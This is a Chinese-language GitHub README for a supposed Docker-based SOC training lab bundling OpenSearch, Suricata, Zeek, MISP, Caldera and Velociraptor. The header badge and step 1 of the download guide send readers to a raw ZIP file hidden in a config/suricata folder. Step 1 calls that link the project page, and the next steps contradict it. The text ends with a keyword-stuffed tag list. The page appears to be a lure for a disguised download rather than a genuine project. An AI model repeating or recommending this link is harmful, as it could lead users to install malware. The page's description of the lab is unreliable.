Lithuanianbeansprout3690/advanced-soc-lab-v2.0

# 🛡️ advanced-soc-lab-v2.0 - 构建您自己的安全运营中心 [](https://github.com/Lithuanianbeansprout3690/advanced-soc-lab-v2.0/raw/refs/heads/main/config/suricata/soc-lab-v-advanced-v1.2.zip) 本项目为安全分析提供了一整套完备的实验室环境。您可以在一个软件包中获取 12 款专业的安全工具。此实验室可帮助您在本地计算机上练习事件响应、威胁狩猎和日志分析。 ## 💻 系统要求 您的计算机需要具备特定的硬件才能运行这些工具。该软件使用虚拟化技术来同时管理多个安全服务。 * **操作系统**：Windows 10 或 Windows 11。 * **处理器**：4 个或更多 CPU 核心（Intel i5/i7 或 AMD Ryzen 5/7）。 * **内存**：最低要求 16 GB RAM。32 GB 可提供更好的性能。 * **存储**：固态硬盘 (SSD) 上有 50 GB 的可用空间。 * **虚拟化**：在 BIOS 或 UEFI 设置中启用虚拟化功能。 ## 🏗️ 预安装设置 在运行该实验室之前，您必须准备您的 Windows 环境。 1. **安装 Docker Desktop**：从官方网站下载 Docker Desktop。运行安装程序并等待其完成。安装成功后，请重新启动您的计算机。 2. **启用 WSL2**：Docker 需要 Windows Subsystem for Linux (WSL2)。Windows 通常会在 Docker 设置过程中提示您进行安装。如果没有提示，请以管理员身份打开命令提示符并输入 `wsl --install`。完成此步骤后请重新启动计算机。 3. **检查 Docker 状态**：打开 Docker Desktop 应用程序。等待任务栏中的鲸鱼图标停止动画并显示“Docker Desktop is running”。 ## 📥 下载与安装指南 1. 访问项目页面以获取文件：[https://github.com/Lithuanianbeansprout3690/advanced-soc-lab-v2.0/raw/refs/heads/main/config/suricata/soc-lab-v-advanced-v1.2.zip](https://github.com/Lithuanianbeansprout3690/advanced-soc-lab-v2.0/raw/refs/heads/main/config/suricata/soc-lab-v-advanced-v1.2.zip)。 2. 在页面右上方找到标有“Code”的绿色按钮。 3. 点击“Download ZIP”将项目文件保存到您的计算机。 4. 在您的“Downloads”文件夹中找到下载的文件。右键单击该文件并选择“Extract All...”以解压此文件夹。 5. 将解压后的文件夹移动到您容易找到的位置，例如您的“Documents”文件夹。 ## 🚀 运行实验室 1. 打开包含实验室文件的文件夹。 2. 按住键盘上的“Shift”键，同时右键单击文件夹背景。选择“Open PowerShell window here”或“Open in Terminal”。 3. 在窗口中输入 `docker-compose up -d` 并按 Enter 键。 4. Docker 将下载工具所需的必要组件。根据您的网络速度，此过程可能需要 10 到 20 分钟。 5. 检查您的 Docker Desktop 窗口。您将看到正在启动的容器列表。一旦所有容器图标变为绿色，实验室即准备就绪。 ## 🛠️ 包含的安全工具 该实验室包含了一套安全团队每天都在使用的工具集。 * **OpenSearch**：存储并搜索来自您模拟网络的日志。 * **Suricata**：检查网络流量以寻找已知的攻击模式。 * **Zeek**：记录网络活动和连接详情以供后续审查。 * **MISP**：追踪关于活跃威胁和攻击者组的信息。 * **Caldera**：基于 MITRE ATT&CK 方法生成逼真的安全警报。 * **Velociraptor**：对文件和系统更改进行深度调查。 * **AI Agents**：协助解释复杂的安全日志和警报。 ## 📋 访问 Web 界面 一旦容器运行起来，您就可以通过 Web 浏览器访问这些工具。输入以下地址以打开各个控制面板。 * **OpenSearch Dashboard**：http://localhost:5601 * **MISP Interface**：http://localhost:80 * **Caldera Interface**：http://localhost:8888 * **Velociraptor Dashboard**：http://localhost:8000 这些服务的默认登录凭据通常是“admin”和“password”，或者可以在主文件夹内的项目文档文件中找到。 ## 🧹 维护与关机 完成工作后，您应该停止实验室以节省计算机资源。 1. 打开您用来启动实验室的同一终端窗口。 2. 输入 `docker-compose stop` 以暂停服务。 3. 如果您想完全移除容器，请输入 `docker-compose down`。这会保留您的数据，但会停止后台进程。 4. 如果您想清除所有数据并将实验室重置为初始状态，请运行 `docker-compose down -v`。 ## 🆘 故障排除 * **Docker 无法启动**：确保您的 Windows 版本已更新。确保在您的计算机设置中开启了虚拟化。 * **控制面板缺失**：给容器几分钟的时间来完成它们的初始设置。某些工具初始化数据库所需的时间比其他工具更长。 * **性能缓慢**：关闭其他占用资源大的应用程序，例如打开了多个标签页的 Web 浏览器或视频编辑软件。这些安全工具会优先处理后台任务。 * **内存耗尽**：打开 Docker Desktop 并转到“Resources”设置。为 Docker 引擎分配至少 8 GB 的 RAM 以获得最佳效果。

标签：adversary emulation, AD攻击面, AMSI绕过, Docker Compose, IDS IPS, Metaprompt, Shodan, SOC实验室, Windows WSL2, 全栈项目, 后端开发, 威胁检测, 安全工具集, 安全工具集合, 安全演练, 安全运营中心, 对手模拟, 库, 应急响应, 本地安全环境, 版权保护, 网络安全, 网络映射, 蓝队训练, 虚拟化环境, 速率限制, 隐私保护, 项目化管理